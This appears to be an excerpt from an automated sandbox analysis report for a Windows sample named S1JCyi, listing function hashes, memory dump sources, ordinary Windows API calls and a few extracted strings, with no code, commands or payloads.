                                      • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                      • Instruction ID: 43feff6a5be13d9ce96729d612758cf30ebe4dc43cb06ddba1b5fba0c6fe0b0d
                                      • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                      • Instruction Fuzzy Hash: F5B17D25B0EE4281EA65DBD7B4446386690AF54FE4F1988FBDE4D077A6DF2CE4E18300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: FileInfoSleepStartupType
                                      • String ID:
                                      • API String ID: 1527402494-0
                                      • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                      • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                      • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                      • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CommandLine$ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 3078728599-0
                                      • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                      • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                      • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                      • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                      • String ID:
                                      • API String ID: 1850339568-0
                                      • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                      • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                      • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                      • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: _set_statfp
                                      • String ID:
                                      • API String ID: 1156100317-0
                                      • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                      • Instruction ID: 34779ad4eb41e9ff54487ff854c538a841f9cf368a3c9a49f86ee22860d15ff1
                                      • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                      • Instruction Fuzzy Hash: DC119472F18E4B01F7A411AAF56637910516F9CBB5F1406F6EBBF062FA8F2CA8E04101
                                      APIs
                                      • FlsGetValue.KERNEL32(?,?,?,00007FFE1A48766F,?,?,00000000,00007FFE1A48790A,?,?,?,?,?,00007FFE1A487896), ref: 00007FFE1A4896A3
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A48766F,?,?,00000000,00007FFE1A48790A,?,?,?,?,?,00007FFE1A487896), ref: 00007FFE1A4896C2
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A48766F,?,?,00000000,00007FFE1A48790A,?,?,?,?,?,00007FFE1A487896), ref: 00007FFE1A4896EA
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A48766F,?,?,00000000,00007FFE1A48790A,?,?,?,?,?,00007FFE1A487896), ref: 00007FFE1A4896FB
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A48766F,?,?,00000000,00007FFE1A48790A,?,?,?,?,?,00007FFE1A487896), ref: 00007FFE1A48970C
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Value
                                      • String ID:
                                      • API String ID: 3702945584-0
                                      • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                      • Instruction ID: e3d0788faaa0a385e34d5155ae2fc6cafc47807ef21366d9b86feb17b7c160af
                                      • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                      • Instruction Fuzzy Hash: 3D116D24F0CE4249FA6867A7755117921415F44FF0F5843F7E87E876F6EE6CA4A28200
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Value
                                      • String ID:
                                      • API String ID: 3702945584-0
                                      • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                      • Instruction ID: 478c89d56e715e464f94ee5d8155ad6941dc83adf8de21cd83006882912d18cb
                                      • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                      • Instruction Fuzzy Hash: 0D11C855F0DE0749FA69A6A3745217911814F44FB0F5807F7D53E4A2F3DE6CB4E68600
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CallEncodePointerTranslator
                                      • String ID: MOC$RCC
                                      • API String ID: 3544855599-2084237596
                                      • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                      • Instruction ID: a6a6e0a4bf7218cd7875aa2893e35de7432df0ab240c1752b72755021dafddb5
                                      • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                      • Instruction Fuzzy Hash: C791A373B08B818AE710DBB6E4402BD7BA0FB44B98F1041BAEA4D17769DF38D1A5C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 2395640692-1018135373
                                      • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                      • Instruction ID: a8daf16de0005ce57aef157321ee6ecc42fe2ea58ed9905c6a722f02667e78df
                                      • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                      • Instruction Fuzzy Hash: DD519132B19A428ADB14CF56E444A7C7391EB44FA8F1085B2DA4A477B9DF7DF8A1C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CallEncodePointerTranslator
                                      • String ID: MOC$RCC
                                      • API String ID: 3544855599-2084237596
                                      • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                      • Instruction ID: 66f81852c06782dbed0d3ff8485488f44f749a17329a4ac7e50079ddcd611860
                                      • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                      • Instruction Fuzzy Hash: FB619332A08B8581D7619B66F4407B9B7A0FB84FA4F144266EB9C07B69CF7CD1E0CB40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                      • String ID: csm$csm
                                      • API String ID: 3896166516-3733052814
                                      • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                      • Instruction ID: 05e6f4ec625233307914ec8bee960cf4d6f92c5f90f92f405f6be26756e56608
                                      • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                      • Instruction Fuzzy Hash: 5551A332708B428ADB648BA2A4842787791EB54FA5F1441F7DA4D43BA9CF3CE4E0C742
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: AddressHandleLoadModuleProc
                                      • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                      • API String ID: 3055805555-3733552308
                                      • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                      • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                      • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                      • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Process$CurrentSizeWorking
                                      • String ID: Shrinking process size
                                      • API String ID: 2122760700-652428428
                                      • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                      • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                      • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                      • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Enter$Leave
                                      • String ID:
                                      • API String ID: 2801635615-0
                                      • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                      • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                      • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                      • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                      • String ID:
                                      • API String ID: 2718003287-0
                                      • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                      • Instruction ID: 10497a629284ef7501dc42cc36fd07f4cc472f15c6ce32f61c39b7ec045c2c3c
                                      • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                      • Instruction Fuzzy Hash: 41D1E572B18A8189E721CFBAE4401FC37B1FB44BA8B5442B6CE5D57BA5DE38D466C340
                                      APIs
                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A48ED07), ref: 00007FFE1A48EE38
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A48ED07), ref: 00007FFE1A48EEC3
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: ConsoleErrorLastMode
                                      • String ID:
                                      • API String ID: 953036326-0
                                      • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                      • Instruction ID: 3b49f0aaf4cbfb60f02f2e0d733fc6f7e1991864f4e99c93d6731a6c54f67428
                                      • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                      • Instruction Fuzzy Hash: 4F91C6A2F18E5295F7709FA6A44127D2BA0AB44FA8F1441F7DE0E576A4DF38D4E6C300
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                      • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                      • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                      • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalEventSection$EnterLeaveReset
                                      • String ID:
                                      • API String ID: 3553466030-0
                                      • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                      • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                      • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                      • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalEventSection$EnterLeaveReset
                                      • String ID:
                                      • API String ID: 3553466030-0
                                      • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                      • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                      • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                      • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                      • String ID:
                                      • API String ID: 2933794660-0
                                      • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                      • Instruction ID: 2ad6a3b3218c86180c1b1e65ce6eba2ab318060a10769251c6ffa80086509de2
                                      • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                      • Instruction Fuzzy Hash: 41111F22B15F018AEB20CB61E8552B833A4F759B68F440972DA6E467A4EF78D1B9C340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CreateEvent$CriticalInitializeSection
                                      • String ID:
                                      • API String ID: 926662266-0
                                      • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                      • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                      • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                      • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: __except_validate_context_record
                                      • String ID: csm$csm
                                      • API String ID: 1467352782-3733052814
                                      • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                      • Instruction ID: ada300ea9ce2b6d4a9c2c5d913bbcf3d47f714086775619114987d8891e3417f
                                      • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                      • Instruction Fuzzy Hash: 71718372709A8186D7608B66A8447BD7BA0FB05FA4F1481B6DE4C47AADCB3CD4B1C781
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
